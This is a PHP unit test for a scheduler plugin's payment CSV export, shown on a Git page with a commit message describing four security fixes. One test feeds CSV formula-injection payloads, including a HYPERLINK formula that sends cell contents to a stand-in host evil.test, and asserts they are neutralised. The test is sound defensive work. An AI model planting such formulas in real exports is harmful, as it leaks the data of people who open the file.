Unsupervised/unsupervised-scheduler
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
f3f5c7801fb188b87745e50b90d8d3769a313752
unsupervised-scheduler/tests/Unit/Payment/PaymentReportTest.php
T
thatguygriff f3f5c7801f
CI / No Debug Code (pull_request) Successful in 3s
Details
CI / Tests (PHP 8.1) (pull_request) Successful in 43s
Details
CI / Tests (PHP 8.3) (pull_request) Successful in 49s
Details
CI / Tests (PHP 8.2) (pull_request) Successful in 59s
Details
CI / Coding Standards (pull_request) Successful in 1m11s
Details
CI / PHPStan (pull_request) Successful in 1m20s
Details
CI / Build Plugin Zip (pull_request) Has been skipped
Details
Security fixes: CSV injection, policy body output, invite hashing, slot datetimes 
Four fixes from a security review pass:

- Neutralise CSV formula injection in the payments export: fields with a
  leading =, +, -, @, tab, or CR (e.g. a hostile student display name) are
  apostrophe-prefixed in PaymentReport::csvLine() so they open as text in
  Excel/Google Sheets. Fixes #39.
- Sanitise policy bodies with wp_kses_post at output in
  PolicyEndpoint::index() (the booking JS renders that HTML raw), so a
  future write path that forgets kses can never become stored XSS.
  Fixes #40.
- Store invite tokens hashed (SHA-256) at rest: a database leak can no
  longer redeem pending invites. The registration link is shown once, at
  creation; the pending list shows email/invited date; lookups hash the
  submitted token. Existing plaintext pending invites must be re-issued.
  Fixes #41.
- Validate availability slot datetimes on both creation paths (REST and
  admin form) via AvailabilitySlot::normalizeDateTime(): canonical and
  datetime-local forms normalise to Y-m-d H:i:s, garbage and end <= start
  are rejected (REST 400) instead of reaching the DATETIME column or
  throwing inside the weekly-series date arithmetic. Fixes #42.

composer test (204 tests, 594 assertions), PHPStan L6, and PHPCS all green.

Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
2026-06-10 16:36:26 -03:00

102 lines
3.5 KiB
PHP
Raw Blame History

<?php
declare(strict_types=1);
namespace Unsupervised\Schedular\Tests\Unit\Payment;
use Unsupervised\Schedular\Payment\PaymentReport;
use Unsupervised\Schedular\Tests\Unit\TestCase;
class PaymentReportTest extends TestCase
{
/**
* @return list<array{date: string, student: string, instructor: string, method: string, status: string, amount: float, tax_rate: float, tax_amount: float, total: float}>
*/
private function rows(): array
{
return [
[
'date' => '2026-06-02',
'student' => 'Ada',
'instructor' => 'Pat',
'method' => 'etransfer',
'status' => 'paid',
'amount' => 100.00,
'tax_rate' => 13.0,
'tax_amount' => 13.00,
'total' => 113.00,
],
[
'date' => '2026-06-09',
'student' => 'Grace',
'instructor' => 'Pat',
'method' => 'card',
'status' => 'paid',
'amount' => 50.00,
'tax_rate' => 13.0,
'tax_amount' => 6.50,
'total' => 56.50,
],
];
}
public function testTotalsAggregateAmountsAndTax(): void
{
$report = new PaymentReport($this->rows());
self::assertSame(2, $report->count());
self::assertSame(150.00, $report->totalAmount());
self::assertSame(19.50, $report->totalTax());
self::assertSame(169.50, $report->grandTotal());
}
public function testEmptyReportHasZeroTotals(): void
{
$report = new PaymentReport([]);
self::assertSame(0, $report->count());
self::assertSame(0.0, $report->totalTax());
self::assertSame(0.0, $report->grandTotal());
}
public function testCsvIncludesHeaderRowsAndTotals(): void
{
$csv = (new PaymentReport($this->rows()))->toCsv();
$lines = explode("\n", trim($csv));
// header + 2 data rows + totals row.
self::assertCount(4, $lines);
self::assertStringContainsString('"Date","Student","Instructor"', $lines[0]);
self::assertStringContainsString('"Ada"', $lines[1]);
self::assertStringContainsString('"Totals"', $lines[3]);
self::assertStringContainsString('"19.50"', $lines[3]);
self::assertStringContainsString('"169.50"', $lines[3]);
}
public function testCsvEscapesEmbeddedQuotes(): void
{
$rows = $this->rows();
$rows[0]['student'] = 'Ada "The Great"';
$csv = (new PaymentReport($rows))->toCsv();
self::assertStringContainsString('"Ada ""The Great"""', $csv);
}
public function testCsvNeutralisesFormulaInjectionInNames(): void
{
$rows = $this->rows();
$rows[0]['student'] = '=HYPERLINK("https://evil.test/?"&A1,"total")';
$rows[0]['instructor'] = '@SUM(A1)';
$rows[1]['student'] = "+1+2";
$rows[1]['instructor'] = "\tcmd";
$csv = (new PaymentReport($rows))->toCsv();
self::assertStringContainsString('"\'=HYPERLINK(""https://evil.test/?""&A1,""total"")"', $csv);
self::assertStringContainsString('"\'@SUM(A1)"', $csv);
self::assertStringContainsString('"\'+1+2"', $csv);
self::assertStringContainsString("\"'\tcmd\"", $csv);
// Safe fields are untouched.
self::assertStringContainsString('"2026-06-02"', $csv);
self::assertStringContainsString('"100.00"', $csv);
}
}
Reference in New Issue View Git Blame Copy Permalink